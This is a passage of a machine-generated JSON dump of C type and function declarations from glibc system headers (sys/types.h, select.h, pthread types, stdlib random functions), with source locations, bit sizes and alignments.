"clock_t", "location": "/usr/include/x86_64-linux-gnu/bits/types/clock_t.h:7:19", "type": { "tag": "__clock_t" } }, { "tag": "typedef", "ns": 0, "name": "clockid_t", "location": "/usr/include/x86_64-linux-gnu/bits/types/clockid_t.h:7:21", "type": { "tag": "__clockid_t" } }, { "tag": "typedef", "ns": 0, "name": "time_t", "location": "/usr/include/x86_64-linux-gnu/bits/types/time_t.h:7:18", "type": { "tag": "__time_t" } }, { "tag": "typedef", "ns": 0, "name": "timer_t", "location": "/usr/include/x86_64-linux-gnu/bits/types/timer_t.h:7:19", "type": { "tag": "__timer_t" } }, { "tag": "typedef", "ns": 0, "name": "ulong", "location": "/usr/include/x86_64-linux-gnu/sys/types.h:148:27", "type": { "tag": ":unsigned-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "typedef", "ns": 0, "name": "ushort", "location": "/usr/include/x86_64-linux-gnu/sys/types.h:149:28", "type": { "tag": ":unsigned-short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "typedef", "ns": 0, "name": "uint", "location": "/usr/include/x86_64-linux-gnu/sys/types.h:150:22", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "typedef", "ns": 0, "name": "int8_t", "location": "/usr/include/x86_64-linux-gnu/bits/stdint-intn.h:24:18", "type": { "tag": "__int8_t" } }, { "tag": "typedef", "ns": 0, "name": "int16_t", "location": "/usr/include/x86_64-linux-gnu/bits/stdint-intn.h:25:19", "type": { "tag": "__int16_t" } }, { "tag": "typedef", "ns": 0, "name": "int32_t", "location": "/usr/include/x86_64-linux-gnu/bits/stdint-intn.h:26:19", "type": { "tag": "__int32_t" } }, { "tag": "typedef", "ns": 0, "name": "int64_t", "location": "/usr/include/x86_64-linux-gnu/bits/stdint-intn.h:27:19", "type": { "tag": "__int64_t" } }, { "tag": "typedef", "ns": 0, "name": "u_int8_t", "location": "/usr/include/x86_64-linux-gnu/sys/types.h:158:19", "type": { "tag": "__uint8_t" } }, { "tag": "typedef", "ns": 0, "name": "u_int16_t", "location": "/usr/include/x86_64-linux-gnu/sys/types.h:159:20", "type": { "tag": "__uint16_t" } }, { "tag": "typedef", "ns": 0, "name": "u_int32_t", "location": "/usr/include/x86_64-linux-gnu/sys/types.h:160:20", "type": { "tag": "__uint32_t" } }, { "tag": "typedef", "ns": 0, "name": "u_int64_t", "location": "/usr/include/x86_64-linux-gnu/sys/types.h:161:20", "type": { "tag": "__uint64_t" } }, { "tag": "typedef", "ns": 0, "name": "register_t", "location": "/usr/include/x86_64-linux-gnu/sys/types.h:164:13", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "__bswap_16", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/byteswap.h:34:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__bsx", "type": { "tag": "__uint16_t" } }], "return-type": { "tag": "__uint16_t" } }, { "tag": "function", "name": "__bswap_32", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/byteswap.h:49:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__bsx", "type": { "tag": "__uint32_t" } }], "return-type": { "tag": "__uint32_t" } }, { "tag": "function", "name": "__bswap_64", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/byteswap.h:70:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__bsx", "type": { "tag": "__uint64_t" } }], "return-type": { "tag": "__uint64_t" } }, { "tag": "function", "name": "__uint16_identity", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/uintn-identity.h:33:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": "__uint16_t" } }], "return-type": { "tag": "__uint16_t" } }, { "tag": "function", "name": "__uint32_identity", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/uintn-identity.h:39:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": "__uint32_t" } }], "return-type": { "tag": "__uint32_t" } }, { "tag": "function", "name": "__uint64_identity", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/uintn-identity.h:45:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__x", "type": { "tag": "__uint64_t" } }], "return-type": { "tag": "__uint64_t" } }, { "tag": "typedef", "ns": 0, "name": "__sigset_t", "location": "/usr/include/x86_64-linux-gnu/bits/types/__sigset_t.h:8:3", "type": { "tag": "struct", "ns": 0, "name": "", "id": 15, "location": "/usr/include/x86_64-linux-gnu/bits/types/__sigset_t.h:5:9", "bit-size": 1024, "bit-alignment": 64, "fields": [{ "tag": "field", "name": "__val", "bit-offset": 0, "bit-size": 1024, "bit-alignment": 64, "type": { "tag": ":array", "type": { "tag": ":unsigned-long", "bit-size": 64, "bit-alignment": 64 }, "size": 16 } }] } }, { "tag": "typedef", "ns": 0, "name": "sigset_t", "location": "/usr/include/x86_64-linux-gnu/bits/types/sigset_t.h:7:20", "type": { "tag": "__sigset_t" } }, { "tag": "struct", "ns": 0, "name": "timeval", "id": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types/struct_timeval.h:8:8", "bit-size": 128, "bit-alignment": 64, "fields": [{ "tag": "field", "name": "tv_sec", "bit-offset": 0, "bit-size": 64, "bit-alignment": 64, "type": { "tag": "__time_t" } }, { "tag": "field", "name": "tv_usec", "bit-offset": 64, "bit-size": 64, "bit-alignment": 64, "type": { "tag": "__suseconds_t" } }] }, { "tag": "struct", "ns": 0, "name": "timespec", "id": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types/struct_timespec.h:9:8", "bit-size": 128, "bit-alignment": 64, "fields": [{ "tag": "field", "name": "tv_sec", "bit-offset": 0, "bit-size": 64, "bit-alignment": 64, "type": { "tag": "__time_t" } }, { "tag": "field", "name": "tv_nsec", "bit-offset": 64, "bit-size": 64, "bit-alignment": 64, "type": { "tag": "__syscall_slong_t" } }] }, { "tag": "typedef", "ns": 0, "name": "suseconds_t", "location": "/usr/include/x86_64-linux-gnu/sys/select.h:43:23", "type": { "tag": "__suseconds_t" } }, { "tag": "typedef", "ns": 0, "name": "__fd_mask", "location": "/usr/include/x86_64-linux-gnu/sys/select.h:49:18", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "typedef", "ns": 0, "name": "fd_set", "location": "/usr/include/x86_64-linux-gnu/sys/select.h:70:5", "type": { "tag": "struct", "ns": 0, "name": "", "id": 16, "location": "/usr/include/x86_64-linux-gnu/sys/select.h:59:9", "bit-size": 1024, "bit-alignment": 64, "fields": [{ "tag": "field", "name": "__fds_bits", "bit-offset": 0, "bit-size": 1024, "bit-alignment": 64, "type": { "tag": ":array", "type": { "tag": "__fd_mask" }, "size": 16 } }] } }, { "tag": "typedef", "ns": 0, "name": "fd_mask", "location": "/usr/include/x86_64-linux-gnu/sys/select.h:77:19", "type": { "tag": "__fd_mask" } }, { "tag": "function", "name": "select", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/select.h:101:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__nfds", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__readfds", "type": { "tag": ":pointer", "type": { "tag": "fd_set" } } }, { "tag": "parameter", "name": "__writefds", "type": { "tag": ":pointer", "type": { "tag": "fd_set" } } }, { "tag": "parameter", "name": "__exceptfds", "type": { "tag": ":pointer", "type": { "tag": "fd_set" } } }, { "tag": "parameter", "name": "__timeout", "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "timeval", "id": 17 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "pselect", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/select.h:113:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__nfds", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__readfds", "type": { "tag": ":pointer", "type": { "tag": "fd_set" } } }, { "tag": "parameter", "name": "__writefds", "type": { "tag": ":pointer", "type": { "tag": "fd_set" } } }, { "tag": "parameter", "name": "__exceptfds", "type": { "tag": ":pointer", "type": { "tag": "fd_set" } } }, { "tag": "parameter", "name": "__timeout", "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "timespec", "id": 18 } } }, { "tag": "parameter", "name": "__sigmask", "type": { "tag": ":pointer", "type": { "tag": "__sigset_t" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "typedef", "ns": 0, "name": "blksize_t", "location": "/usr/include/x86_64-linux-gnu/sys/types.h:185:21", "type": { "tag": "__blksize_t" } }, { "tag": "typedef", "ns": 0, "name": "blkcnt_t", "location": "/usr/include/x86_64-linux-gnu/sys/types.h:192:20", "type": { "tag": "__blkcnt_t" } }, { "tag": "typedef", "ns": 0, "name": "fsblkcnt_t", "location": "/usr/include/x86_64-linux-gnu/sys/types.h:196:22", "type": { "tag": "__fsblkcnt_t" } }, { "tag": "typedef", "ns": 0, "name": "fsfilcnt_t", "location": "/usr/include/x86_64-linux-gnu/sys/types.h:200:22", "type": { "tag": "__fsfilcnt_t" } }, { "tag": "struct", "ns": 0, "name": "__pthread_rwlock_arch_t", "id": 0, "location": "/usr/include/x86_64-linux-gnu/bits/pthreadtypes-arch.h:65:8", "bit-size": 448, "bit-alignment": 64, "fields": [{ "tag": "field", "name": "__readers", "bit-offset": 0, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "__writers", "bit-offset": 32, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "__wrphase_futex", "bit-offset": 64, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "__writers_futex", "bit-offset": 96, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "__pad3", "bit-offset": 128, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "__pad4", "bit-offset": 160, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "__cur_writer", "bit-offset": 192, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "__shared", "bit-offset": 224, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "__rwelision", "bit-offset": 256, "bit-size": 8, "bit-alignment": 8, "type": { "tag": ":signed-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "field", "name": "__pad1", "bit-offset": 264, "bit-size": 56, "bit-alignment": 8, "type": { "tag": ":array", "type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 }, "size": 7 } }, { "tag": "field", "name": "__pad2", "bit-offset": 320, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":unsigned-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "field", "name": "__flags", "bit-offset": 384, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }] }, { "tag": "struct", "ns": 0, "name": "__pthread_internal_list", "id": 0, "location": "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h:82:16", "bit-size": 128, "bit-alignment": 64, "fields": [{ "tag": "field", "name": "__prev", "bit-offset": 0, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "__pthread_internal_list", "id": 19 } } }, { "tag": "field", "name": "__next", "bit-offset": 64, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "__pthread_internal_list", "id": 19 } } }] }, { "tag": "typedef", "ns": 0, "name": "__pthread_list_t", "location": "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h:86:3", "type": { "tag": ":struct", "name": "__pthread_internal_list", "id": 19 } }, { "tag": "struct", "ns": 0, "name": "__pthread_mutex_s", "id": 0, "location": "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h:118:8", "bit-size": 320, "bit-alignment": 64, "fields": [{ "tag": "field", "name": "__lock", "bit-offset": 0, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "__count", "bit-offset": 32, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "__owner", "bit-offset": 64, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "__nusers", "bit-offset": 96, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "__kind", "bit-offset": 128, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "__spins", "bit-offset": 160, "bit-size": 16, "bit-alignment": 16, "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "field", "name": "__elision", "bit-offset": 176, "bit-size": 16, "bit-alignment": 16, "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "field", "name": "__list", "bit-offset": 192, "bit-size": 128, "bit-alignment": 64, "type": { "tag": "__pthread_list_t" } }] }, { "tag": "struct", "ns": 0, "name": "__pthread_cond_s", "id": 0, "location": "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h:171:8", "bit-size": 384, "bit-alignment": 64, "fields": [{ "tag": "field", "name": "", "bit-offset": 0, "bit-size": 64, "bit-alignment": 64, "type": { "tag": "union", "ns": 0, "name": "", "id": 20, "location": "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h:173:17", "bit-size": 64, "bit-alignment": 64, "fields": [{ "tag": "field", "name": "__wseq", "bit-offset": 0, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "field", "name": "__wseq32", "bit-offset": 0, "bit-size": 64, "bit-alignment": 32, "type": { "tag": "struct", "ns": 0, "name": "", "id": 21, "location": "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h:176:5", "bit-size": 64, "bit-alignment": 32, "fields": [{ "tag": "field", "name": "__low", "bit-offset": 0, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "__high", "bit-offset": 32, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }] } }] } }, { "tag": "field", "name": "", "bit-offset": 64, "bit-size": 64, "bit-alignment": 64, "type": { "tag": "union", "ns": 0, "name": "", "id": 22, "location": "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h:182:17", "bit-size": 64, "bit-alignment": 64, "fields": [{ "tag": "field", "name": "__g1_start", "bit-offset": 0, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":unsigned-long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "field", "name": "__g1_start32", "bit-offset": 0, "bit-size": 64, "bit-alignment": 32, "type": { "tag": "struct", "ns": 0, "name": "", "id": 23, "location": "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h:185:5", "bit-size": 64, "bit-alignment": 32, "fields": [{ "tag": "field", "name": "__low", "bit-offset": 0, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "__high", "bit-offset": 32, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }] } }] } }, { "tag": "field", "name": "__g_refs", "bit-offset": 128, "bit-size": 64, "bit-alignment": 32, "type": { "tag": ":array", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 }, "size": 2 } }, { "tag": "field", "name": "__g_size", "bit-offset": 192, "bit-size": 64, "bit-alignment": 32, "type": { "tag": ":array", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 }, "size": 2 } }, { "tag": "field", "name": "__g1_orig_size", "bit-offset": 256, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "__wrefs", "bit-offset": 288, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "__g_signals", "bit-offset": 320, "bit-size": 64, "bit-alignment": 32, "type": { "tag": ":array", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 }, "size": 2 } }] }, { "tag": "typedef", "ns": 0, "name": "pthread_t", "location": "/usr/include/x86_64-linux-gnu/bits/pthreadtypes.h:27:27", "type": { "tag": ":unsigned-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "typedef", "ns": 0, "name": "pthread_mutexattr_t", "location": "/usr/include/x86_64-linux-gnu/bits/pthreadtypes.h:36:3", "type": { "tag": "union", "ns": 0, "name": "", "id": 24, "location": "/usr/include/x86_64-linux-gnu/bits/pthreadtypes.h:32:9", "bit-size": 32, "bit-alignment": 32, "fields": [{ "tag": "field", "name": "__size", "bit-offset": 0, "bit-size": 32, "bit-alignment": 8, "type": { "tag": ":array", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 }, "size": 4 } }, { "tag": "field", "name": "__align", "bit-offset": 0, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }] } }, { "tag": "typedef", "ns": 0, "name": "pthread_condattr_t", "location": "/usr/include/x86_64-linux-gnu/bits/pthreadtypes.h:45:3", "type": { "tag": "union", "ns": 0, "name": "", "id": 25, "location": "/usr/include/x86_64-linux-gnu/bits/pthreadtypes.h:41:9", "bit-size": 32, "bit-alignment": 32, "fields": [{ "tag": "field", "name": "__size", "bit-offset": 0, "bit-size": 32, "bit-alignment": 8, "type": { "tag": ":array", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 }, "size": 4 } }, { "tag": "field", "name": "__align", "bit-offset": 0, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }] } }, { "tag": "typedef", "ns": 0, "name": "pthread_key_t", "location": "/usr/include/x86_64-linux-gnu/bits/pthreadtypes.h:49:22", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "typedef", "ns": 0, "name": "pthread_once_t", "location": "/usr/include/x86_64-linux-gnu/bits/pthreadtypes.h:53:30", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "union", "ns": 0, "name": "pthread_attr_t", "id": 0, "location": "/usr/include/x86_64-linux-gnu/bits/pthreadtypes.h:56:7", "bit-size": 448, "bit-alignment": 64, "fields": [{ "tag": "field", "name": "__size", "bit-offset": 0, "bit-size": 448, "bit-alignment": 8, "type": { "tag": ":array", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 }, "size": 56 } }, { "tag": "field", "name": "__align", "bit-offset": 0, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }] }, { "tag": "typedef", "ns": 0, "name": "pthread_attr_t", "location": "/usr/include/x86_64-linux-gnu/bits/pthreadtypes.h:62:30", "type": { "tag": ":union", "name": "pthread_attr_t", "id": 26 } }, { "tag": "typedef", "ns": 0, "name": "pthread_mutex_t", "location": "/usr/include/x86_64-linux-gnu/bits/pthreadtypes.h:72:3", "type": { "tag": "union", "ns": 0, "name": "", "id": 27, "location": "/usr/include/x86_64-linux-gnu/bits/pthreadtypes.h:67:9", "bit-size": 320, "bit-alignment": 64, "fields": [{ "tag": "field", "name": "__data", "bit-offset": 0, "bit-size": 320, "bit-alignment": 64, "type": { "tag": ":struct", "name": "__pthread_mutex_s", "id": 28 } }, { "tag": "field", "name": "__size", "bit-offset": 0, "bit-size": 320, "bit-alignment": 8, "type": { "tag": ":array", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 }, "size": 40 } }, { "tag": "field", "name": "__align", "bit-offset": 0, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }] } }, { "tag": "typedef", "ns": 0, "name": "pthread_cond_t", "location": "/usr/include/x86_64-linux-gnu/bits/pthreadtypes.h:80:3", "type": { "tag": "union", "ns": 0, "name": "", "id": 29, "location": "/usr/include/x86_64-linux-gnu/bits/pthreadtypes.h:75:9", "bit-size": 384, "bit-alignment": 64, "fields": [{ "tag": "field", "name": "__data", "bit-offset": 0, "bit-size": 384, "bit-alignment": 64, "type": { "tag": ":struct", "name": "__pthread_cond_s", "id": 30 } }, { "tag": "field", "name": "__size", "bit-offset": 0, "bit-size": 384, "bit-alignment": 8, "type": { "tag": ":array", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 }, "size": 48 } }, { "tag": "field", "name": "__align", "bit-offset": 0, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }] } }, { "tag": "typedef", "ns": 0, "name": "pthread_rwlock_t", "location": "/usr/include/x86_64-linux-gnu/bits/pthreadtypes.h:91:3", "type": { "tag": "union", "ns": 0, "name": "", "id": 31, "location": "/usr/include/x86_64-linux-gnu/bits/pthreadtypes.h:86:9", "bit-size": 448, "bit-alignment": 64, "fields": [{ "tag": "field", "name": "__data", "bit-offset": 0, "bit-size": 448, "bit-alignment": 64, "type": { "tag": ":struct", "name": "__pthread_rwlock_arch_t", "id": 32 } }, { "tag": "field", "name": "__size", "bit-offset": 0, "bit-size": 448, "bit-alignment": 8, "type": { "tag": ":array", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 }, "size": 56 } }, { "tag": "field", "name": "__align", "bit-offset": 0, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }] } }, { "tag": "typedef", "ns": 0, "name": "pthread_rwlockattr_t", "location": "/usr/include/x86_64-linux-gnu/bits/pthreadtypes.h:97:3", "type": { "tag": "union", "ns": 0, "name": "", "id": 33, "location": "/usr/include/x86_64-linux-gnu/bits/pthreadtypes.h:93:9", "bit-size": 64, "bit-alignment": 64, "fields": [{ "tag": "field", "name": "__size", "bit-offset": 0, "bit-size": 64, "bit-alignment": 8, "type": { "tag": ":array", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 }, "size": 8 } }, { "tag": "field", "name": "__align", "bit-offset": 0, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }] } }, { "tag": "typedef", "ns": 0, "name": "pthread_spinlock_t", "location": "/usr/include/x86_64-linux-gnu/bits/pthreadtypes.h:103:22", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "typedef", "ns": 0, "name": "pthread_barrier_t", "location": "/usr/include/x86_64-linux-gnu/bits/pthreadtypes.h:112:3", "type": { "tag": "union", "ns": 0, "name": "", "id": 34, "location": "/usr/include/x86_64-linux-gnu/bits/pthreadtypes.h:108:9", "bit-size": 256, "bit-alignment": 64, "fields": [{ "tag": "field", "name": "__size", "bit-offset": 0, "bit-size": 256, "bit-alignment": 8, "type": { "tag": ":array", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 }, "size": 32 } }, { "tag": "field", "name": "__align", "bit-offset": 0, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }] } }, { "tag": "typedef", "ns": 0, "name": "pthread_barrierattr_t", "location": "/usr/include/x86_64-linux-gnu/bits/pthreadtypes.h:118:3", "type": { "tag": "union", "ns": 0, "name": "", "id": 35, "location": "/usr/include/x86_64-linux-gnu/bits/pthreadtypes.h:114:9", "bit-size": 32, "bit-alignment": 32, "fields": [{ "tag": "field", "name": "__size", "bit-offset": 0, "bit-size": 32, "bit-alignment": 8, "type": { "tag": ":array", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 }, "size": 4 } }, { "tag": "field", "name": "__align", "bit-offset": 0, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }] } }, { "tag": "function", "name": "random", "ns": 0, "location": "/usr/include/stdlib.h:401:17", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [], "return-type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "srandom", "ns": 0, "location": "/usr/include/stdlib.h:404:13", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__seed", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "initstate", "ns": 0, "location": "/usr/include/stdlib.h:410:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__seed", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__statebuf", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__statelen", "type": { "tag": "size_t" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "setstate", "ns": 0, "location": "/usr/include/stdlib.h:415:14", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__statebuf", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "struct", "ns": 0, "name": "random_data", "id": 0, "location": "/usr/include/stdlib.h:423:8", "bit-size": 384, "bit-alignment": 64, "fields": [{ "tag": "field", "name": "fptr", "bit-offset": 0, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": "int32_t" } } }, { "tag": "field", "name": "rptr", "bit-offset": 64, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": "int32_t" } } }, { "tag": "field", "name": "state", "bit-offset": 128, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": "int32_t" } } }, { "tag": "field", "name": "rand_type", "bit-offset": 192, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "rand_deg", "bit-offset": 224, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "rand_sep", "bit-offset": 256, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "end_ptr", "bit-offset": 320, "bit-size": 64, "bit-alignment": 64, "type": { "tag": ":pointer", "type": { "tag": "int32_t" } } }] }, { "tag": "function", "name": "random_r", "ns": 0, "location": "/usr/include/stdlib.h:434:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__buf", "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "random_data", "id": 36 } } }, { "tag": "parameter", "name": "__result", "type": { "tag": ":pointer", "type": { "tag": "int32_t" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "srandom_r", "ns": 0, "location": "/usr/include/stdlib.h:437:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__seed", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__buf", "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "random_data", "id": 36 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "initstate_r", "ns": 0, "location": "/usr/include/stdlib.h:440:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__seed", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__statebuf", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__statelen", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "__buf", "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "random_data", "id": 36 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "setstate_r", "ns": 0, "location": "/usr/include/stdlib.h:445:12", "variadic": false, "inline": false, "storage-class": "extern", "parameters": [{ "tag": "parameter", "name": "__statebuf", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "__buf", "type": { "tag": ":pointer", "type": { "tag": ":struct", "name": "random_data", "id": 36 } } }], "return-type": { "tag": 